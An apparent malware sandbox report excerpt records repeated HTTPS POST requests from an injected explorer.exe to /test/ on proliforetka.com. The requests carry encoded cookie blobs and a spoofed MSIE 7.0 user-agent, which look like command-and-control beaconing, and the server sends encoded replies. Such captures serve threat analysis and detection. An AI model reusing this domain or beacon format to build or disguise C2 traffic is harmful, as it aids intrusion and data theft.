                                                                                                                                2024-12-17 16:57:27 UTC12248OUTData Raw: 69 41 49 75 63 70 30 53 37 47 47 69 4b 65 42 54 77 56 73 53 4d 48 32 52 30 75 6b 41 34 7a 47 70 51 43 41 6d 38 51 2b 61 56 78 4f 2b 6e 2f 55 38 4b 38 67 61 78 56 6b 7a 41 55 75 55 57 41 6f 2f 39 58 32 75 6b 39 38 51 5a 66 54 49 52 42 66 6d 61 47 36 4c 42 53 69 67 6d 64 65 63 4c 6e 57 6c 47 50 61 48 42 63 35 52 6f 62 7a 43 57 74 68 4a 46 7a 39 6b 61 54 33 32 59 48 6e 43 6c 43 67 64 47 36 58 4d 44 44 7a 36 61 45 57 46 49 6e 78 58 67 6e 72 31 44 45 36 51 50 59 47 58 5a 39 5a 39 5a 37 34 39 67 57 32 58 53 7a 79 79 76 35 6e 6d 54 43 2f 31 58 4c 45 66 6b 45 48 62 50 59 63 58 65 71 73 43 2b 64 53 41 6a 41 56 56 79 4f 50 5a 59 4f 50 6a 6f 4c 6c 51 72 7a 50 4f 4e 70 76 39 44 62 6e 69 52 63 4e 34 35 2f 78 59 4c 57 42 6d 6d 7a 37 7a 54 79 4e 33 54 49 4c 47 30 4e 57
                                                                                                                                Data Ascii: iAIucp0S7GGiKeBTwVsSMH2R0ukA4zGpQCAm8Q+aVxO+n/U8K8gaxVkzAUuUWAo/9X2uk98QZfTIRBfmaG6LBSigmdecLnWlGPaHBc5RobzCWthJFz9kaT32YHnClCgdG6XMDDz6aEWFInxXgnr1DE6QPYGXZ9Z9Z749gW2XSzyyv5nmTC/1XLEfkEHbPYcXeqsC+dSAjAVVyOPZYOPjoLlQrzPONpv9DbniRcN45/xYLWBmmz7zTyN3TILG0NW
                                                                                                                                2024-12-17 16:57:29 UTC807INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:29 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Myd5Q8oyvkzIBBeW8itdnWFVOCZloqSz2xha5w5wrh0cCZoto1g2LwbBSTapNtRfGt4dZU%2FlDCgB1YRlCGP98Ov78J2SEXYAAXylHOjlMJuV%2FCEyIqpPsUJKJJ4qNei"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3873ce1b6a8ce0-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1814&min_rtt=1809&rtt_var=689&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2831&recv_bytes=13348&delivery_rate=1577525&cwnd=206&unsent_bytes=0&cid=89d9ddef29827222&ts=1624&x=0"
                                                                                                                                2024-12-17 16:57:29 UTC562INData Raw: 32 34 63 0d 0a 6c 6c 6c 6f 4b 63 4a 4e 75 46 66 79 4a 70 51 32 67 54 52 46 47 33 76 4e 67 65 78 52 72 55 47 7a 48 55 46 64 67 48 4c 63 41 41 4c 70 35 5a 59 39 53 49 46 33 72 44 30 63 57 30 47 57 49 33 39 72 75 51 44 54 34 36 35 48 44 34 4f 75 43 45 53 57 47 42 4c 6e 59 6d 58 42 32 71 79 63 65 51 37 36 61 37 61 52 64 63 6b 4f 32 2b 53 7a 47 75 30 34 46 32 77 63 4d 6b 71 77 64 67 33 48 79 31 56 44 62 2b 6a 35 52 56 6d 6b 48 79 62 6d 59 67 6b 4a 6a 48 32 42 5a 52 58 42 51 76 4f 70 41 59 41 68 4f 2f 35 57 36 58 69 58 4e 30 37 55 2f 63 4f 73 63 6e 61 62 50 4e 35 44 78 69 6d 4e 61 70 46 6a 66 2f 56 2f 6f 71 62 45 75 58 35 56 6c 70 69 48 47 4b 37 31 31 37 55 47 31 32 4f 39 53 61 53 5a 52 75 69 62 4e 63 45 34 6a 59 35 53 66 77 38 58 77 33 43 66 4b 42 34 37 50 66
                                                                                                                                Data Ascii: 24cllloKcJNuFfyJpQ2gTRFG3vNgexRrUGzHUFdgHLcAALp5ZY9SIF3rD0cW0GWI39ruQDT465HD4OuCESWGBLnYmXB2qyceQ76a7aRdckO2+SzGu04F2wcMkqwdg3Hy1VDb+j5RVmkHybmYgkJjH2BZRXBQvOpAYAhO/5W6XiXN07U/cOscnabPN5DximNapFjf/V/oqbEuX5VlpiHGK7117UG12O9SaSZRuibNcE4jY5Sfw8Xw3CfKB47Pf
                                                                                                                                2024-12-17 16:57:29 UTC33INData Raw: 49 66 2f 62 4d 50 34 71 44 54 42 56 77 68 4b 6f 7a 66 7a 5a 65 33 6d 74 4d 36 6c 79 41 3d 3d 0d 0a
                                                                                                                                Data Ascii: If/bMP4qDTBVwhKozfzZe3mtM6lyA==
                                                                                                                                2024-12-17 16:57:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                12192.168.2.650004172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:31 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX8MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:32 UTC810INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:32 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X3lEEghanftMd%2FQRuyxMllypL0iGFZIruYdaGtqCuL1FDSlMPk8cKG7ujWRH7zI4ItA12iObJuoRGO%2FMzhgRGaMCh9Iul0ohOu7Y7OKEx2%2FuTBYM0pIhd9HRka9rF3yShEM3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3873e65c6bd785-CDG
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=85963&min_rtt=85960&rtt_var=32241&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=33959&cwnd=32&unsent_bytes=0&cid=fadfa013f88a6d79&ts=699&x=0"
                                                                                                                                2024-12-17 16:57:32 UTC343INData Raw: 31 35 30 0d 0a 6c 6c 70 72 49 73 46 4e 76 46 66 30 4a 35 55 79 68 6a 45 50 55 33 72 43 67 4f 35 63 71 79 66 64 46 55 5a 58 68 6e 4f 51 4f 48 53 6e 6f 2b 70 4f 4c 2b 51 52 30 51 5a 4a 56 30 47 59 4a 58 31 68 38 57 6e 54 34 4b 5a 50 44 6f 44 49 51 6b 61 53 47 68 4c 6c 59 53 47 54 34 71 53 65 63 51 6a 31 61 50 2f 44 54 4b 39 6b 6f 59 62 2f 48 2b 31 69 56 79 78 59 63 30 61 73 42 6c 36 5a 6c 41 30 47 4f 37 62 67 4f 6e 33 2b 53 48 7a 37 4c 31 52 4f 70 32 61 38 56 78 4c 41 51 76 66 6a 41 59 5a 50 50 66 31 52 37 78 61 58 4f 67 58 55 2f 73 69 74 4f 6b 79 6e 56 4e 35 43 78 69 2b 46 62 76 6f 6f 51 38 59 62 77 74 6d 6d 75 58 63 64 78 39 76 45 55 65 57 51 7a 4b 4a 48 6b 6a 58 6a 45 62 37 37 50 72 76 66 61 35 63 67 33 74 52 67 5a 55 4a 4c 68 44 32 47 45 57 67 78 4e 76
                                                                                                                                Data Ascii: 150llprIsFNvFf0J5UyhjEPU3rCgO5cqyfdFUZXhnOQOHSno+pOL+QR0QZJV0GYJX1h8WnT4KZPDoDIQkaSGhLlYSGT4qSecQj1aP/DTK9koYb/H+1iVyxYc0asBl6ZlA0GO7bgOn3+SHz7L1ROp2a8VxLAQvfjAYZPPf1R7xaXOgXU/sitOkynVN5Cxi+FbvooQ8YbwtmmuXcdx9vEUeWQzKJHkjXjEb77Prvfa5cg3tRgZUJLhD2GEWgxNv
                                                                                                                                2024-12-17 16:57:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                13192.168.2.650005172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:33 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0JIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:34 UTC809INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:34 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IArdc9Qzrns7un1QN9CPVkOYS97T7QVUlRZc5ct1IQa1eaBEZBKsujY%2FILcQa0QqJjPKJ%2FO2Bpx6l9rWXFy1b9L2syPeqZvsm1R4Xge2mpTi%2FJAo26v64KyfNHaELC03Lqk1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3873f2daa572a5-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2027&min_rtt=2027&rtt_var=1013&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4216&recv_bytes=1059&delivery_rate=168542&cwnd=203&unsent_bytes=0&cid=bb23a52b9ba9daa5&ts=792&x=0"
                                                                                                                                2024-12-17 16:57:34 UTC343INData Raw: 31 35 30 0d 0a 6e 31 31 6f 4a 73 4a 4f 76 31 66 38 49 70 45 37 68 54 4a 42 47 33 2f 50 68 4f 78 58 71 30 36 7a 46 55 4a 58 68 58 48 61 42 67 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 59 4a 33 78 68 38 77 43 34 35 61 35 41 44 6f 4c 42 44 77 2b 51 48 68 6a 67 61 69 36 54 36 61 4b 65 65 51 72 38 61 2f 2f 44 54 4b 39 6b 6f 59 62 2f 48 2b 31 69 56 79 78 59 63 30 61 73 42 6c 36 5a 6c 41 30 47 4f 37 62 67 4f 6e 33 2b 53 48 7a 37 4c 31 52 4f 70 32 61 38 56 78 44 47 51 76 50 6a 42 59 56 50 50 50 78 64 36 68 47 56 4e 51 58 53 2f 4d 75 76 50 30 2f 4f 50 4e 78 47 78 53 47 49 62 37 4a 5a 52 4a 6b 63 33 4d 61 4a 39 44 6f 4a 32 39 76 41 55 71 79 46 7a 50 31 46 6a 7a 62 6d 48 72 66 6d 4b 61 72 41 59 64 68 74 30 74 59 69 50 6c 4e 64 67 32 61 6b 46 6c 6f 37 4e 76
                                                                                                                                Data Ascii: 150n11oJsJOv1f8IpE7hTJBG3/PhOxXq06zFUJXhXHaBgLp5exDOPARyFkPbnOYJ3xh8wC45a5ADoLBDw+QHhjgai6T6aKeeQr8a//DTK9koYb/H+1iVyxYc0asBl6ZlA0GO7bgOn3+SHz7L1ROp2a8VxDGQvPjBYVPPPxd6hGVNQXS/MuvP0/OPNxGxSGIb7JZRJkc3MaJ9DoJ29vAUqyFzP1FjzbmHrfmKarAYdht0tYiPlNdg2akFlo7Nv
                                                                                                                                2024-12-17 16:57:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                14192.168.2.650006172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:35 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0JYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:36 UTC811INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:36 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qXV%2FVLa0qzS0982P3eMSK2VK0dTeFylcZcI1Yk8BAx1KI0rTmz2u9oT4IhYrq2MBmGiNDGTOZA40PvRvqz6O7ER283rXo8Asx1Ab%2BAykB8tv5Q9ltMGF6acZ%2BE94aZJh%2ByK0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3873fff81832dc-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1978&rtt_var=759&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=1425085&cwnd=241&unsent_bytes=0&cid=5632614498f90b6a&ts=767&x=0"
                                                                                                                                2024-12-17 16:57:36 UTC347INData Raw: 31 35 34 0d 0a 6e 56 78 71 4a 63 4a 4b 31 54 6e 33 4a 70 49 78 68 33 39 41 56 58 44 43 68 2b 35 51 78 6b 44 61 48 45 42 5a 68 33 57 51 4f 48 53 6e 6f 2b 70 4f 4c 2b 51 52 30 51 5a 4a 56 55 32 53 49 33 35 76 38 47 6e 65 35 61 5a 43 41 59 58 41 51 6b 71 56 48 42 54 71 61 79 69 54 36 61 61 63 65 41 48 37 61 76 2f 44 54 4b 39 6b 6f 59 62 2f 48 2b 31 69 56 79 78 59 63 30 61 73 42 6c 36 5a 6c 41 30 47 4f 37 62 67 4f 6e 33 2b 53 48 7a 37 4c 31 52 4f 70 32 61 38 56 78 6e 42 52 50 44 74 42 59 31 50 4d 2f 4a 54 36 68 4b 62 4f 77 58 5a 38 38 71 6f 50 45 4b 69 56 4e 78 4c 77 69 36 50 62 50 34 6f 51 38 59 62 77 74 6d 6d 75 58 63 64 78 39 76 45 55 65 57 51 7a 4b 4a 48 6b 6a 58 6a 45 62 37 37 50 72 76 66 61 35 63 67 33 74 52 67 5a 55 4a 4c 68 44 32 47 45 57 67 37 4d 50
                                                                                                                                Data Ascii: 154nVxqJcJK1Tn3JpIxh39AVXDCh+5QxkDaHEBZh3WQOHSno+pOL+QR0QZJVU2SI35v8Gne5aZCAYXAQkqVHBTqayiT6aaceAH7av/DTK9koYb/H+1iVyxYc0asBl6ZlA0GO7bgOn3+SHz7L1ROp2a8VxnBRPDtBY1PM/JT6hKbOwXZ88qoPEKiVNxLwi6PbP4oQ8YbwtmmuXcdx9vEUeWQzKJHkjXjEb77Prvfa5cg3tRgZUJLhD2GEWg7MP
                                                                                                                                2024-12-17 16:57:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                15192.168.2.650008172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:38 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0JoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:38 UTC819INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:38 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ggo2zQRR3g9Hmg%2BR%2BIxQdSpC59mDi7vuLjIAnryQASnr8r9%2Bd08RhI25wxu5VJeezC6rDFj9b0cO926SQDhE%2BYemWEsiPS7xck1qNTn%2BWeVebvZUGVZ%2BD8p1%2F4Jy%2BU9lIgBZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38740f78b00caa-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1584&rtt_var=616&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1746411&cwnd=239&unsent_bytes=0&cid=b2a1fc1c2e653801&ts=757&x=0"
                                                                                                                                2024-12-17 16:57:38 UTC343INData Raw: 31 35 30 0d 0a 6d 31 35 76 49 73 64 4d 75 56 66 32 49 5a 59 36 69 44 56 48 47 33 72 50 69 4f 6c 64 6f 55 79 7a 46 55 6c 59 68 58 48 5a 42 67 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 5a 4a 58 35 72 39 41 58 57 6a 36 6c 42 42 59 4c 45 42 77 2b 52 47 68 44 6e 59 69 76 37 6a 36 65 52 63 41 7a 31 61 62 71 79 53 2f 42 6a 76 35 6e 51 55 36 46 32 53 79 78 63 63 41 2b 35 42 68 57 53 6e 41 4d 64 4b 4c 48 6a 4c 53 47 7a 52 48 36 35 64 45 56 59 6f 44 32 65 55 43 76 41 54 66 48 6b 41 6f 59 6c 56 50 74 53 37 78 65 58 4d 6b 6d 63 2b 38 71 6e 4f 55 2b 69 50 62 52 4b 77 69 71 4f 61 2f 6c 6e 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 50 66
                                                                                                                                Data Ascii: 150m15vIsdMuVf2IZY6iDVHG3rPiOldoUyzFUlYhXHZBgLp5exDOPARyFkPbnOZJX5r9AXWj6lBBYLEBw+RGhDnYiv7j6eRcAz1abqyS/Bjv5nQU6F2SyxccA+5BhWSnAMdKLHjLSGzRH65dEVYoD2eUCvATfHkAoYlVPtS7xeXMkmc+8qnOU+iPbRKwiqOa/lnMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28IPf
                                                                                                                                2024-12-17 16:57:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                16192.168.2.650009172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:40 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0J4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:41 UTC812INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:41 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dySpeG0fi4qEhx4tFbqiIUaLmqwpMdL14FuUJlAlcTBYq77ccocR1EuF24%2F%2BrLVp4FwHbygf2apJaTx1yZsCew9UqRiHcvzHsrW79%2F1v1lcN%2BBbHrPsDBsXT42k8dJHvFO4U"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38741f7ed8432b-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2348&min_rtt=2348&rtt_var=1174&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4218&recv_bytes=1059&delivery_rate=235464&cwnd=189&unsent_bytes=0&cid=bf7c3f87e1d4b381&ts=1052&x=0"
                                                                                                                                2024-12-17 16:57:41 UTC343INData Raw: 31 35 30 0d 0a 6d 6c 31 73 4a 73 52 46 76 6c 66 32 4c 4a 30 77 68 44 73 50 55 6e 44 4f 68 65 74 55 6f 43 66 59 47 6b 46 58 6a 48 48 63 53 58 50 75 72 4f 4e 4b 50 4f 4d 57 7a 30 64 4f 61 55 2b 57 49 33 78 76 38 51 43 34 36 61 35 46 41 34 4c 41 43 67 2b 51 48 42 6a 71 59 69 6e 31 6a 36 32 51 65 41 72 35 61 37 47 79 53 2f 42 6a 76 35 6e 51 55 36 46 32 53 79 78 63 63 41 2b 35 42 68 57 53 6e 41 4d 64 4b 4c 48 6a 4c 53 47 7a 52 48 36 35 64 45 56 59 6f 44 32 65 55 43 76 42 54 66 48 74 42 49 63 6f 56 50 4a 57 37 52 2b 53 4d 30 36 63 38 38 71 72 4f 55 4b 6a 50 4c 52 48 77 69 6d 4c 62 76 74 6e 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 4d 66
                                                                                                                                Data Ascii: 150ml1sJsRFvlf2LJ0whDsPUnDOhetUoCfYGkFXjHHcSXPurONKPOMWz0dOaU+WI3xv8QC46a5FA4LACg+QHBjqYin1j62QeAr5a7GyS/Bjv5nQU6F2SyxccA+5BhWSnAMdKLHjLSGzRH65dEVYoD2eUCvBTfHtBIcoVPJW7R+SM06c88qrOUKjPLRHwimLbvtnMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28IMf
                                                                                                                                2024-12-17 16:57:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                17192.168.2.650010172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:57:43 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0IIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:44 UTC817INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:44 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2vdK%2FrK6ps%2Bkx1rPPg4JNspFvAUPHZy2Xkme%2Br0KCKwQXJ4quY8HqXx9dqbqSGjHqZng9AJlFuqjQhMNQzMKrn%2F1%2Fl4pvMEd5Soj932qVbNbXjzuIt9O4Zj5C8GJD0iJ%2F5MJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38742dfb4a6608-AMS
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=78116&min_rtt=78100&rtt_var=29320&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=37325&cwnd=32&unsent_bytes=0&cid=f2b22200be2e5780&ts=1704&x=0"
                                                                                                                                2024-12-17 16:57:44 UTC347INData Raw: 31 35 34 0d 0a 6d 6c 4e 72 4a 38 4a 4c 75 31 66 39 49 70 77 7a 67 44 74 4c 47 33 2f 4b 67 2b 70 58 71 45 32 7a 47 45 6c 65 67 48 50 62 41 51 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 59 4a 6e 6c 70 38 41 62 54 6a 36 6c 44 41 49 66 44 42 6b 72 5a 47 42 58 6e 59 79 7a 2f 35 38 75 64 65 67 48 30 62 37 48 2b 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 51 50 72 6b 44 6f 49 6c 50 35 56 56 36 68 36 54 4d 6b 6a 53 74 73 2b 73 4f 6b 32 69 4f 74 4d 74 77 43 69 4a 62 2f 39 6c 64 72 42 44 6d 73 43 6e 69 52 55 64 6e 74 50 59 56 65 4c 61 6b 4c 63 59 7a 79 72 39 46 37 54 39 4b 72 48 5a 5a 59 4a 6c 33 4a 56 75 4a 56 73 42 67 79 7a 61 61 45 30 50 44 2f
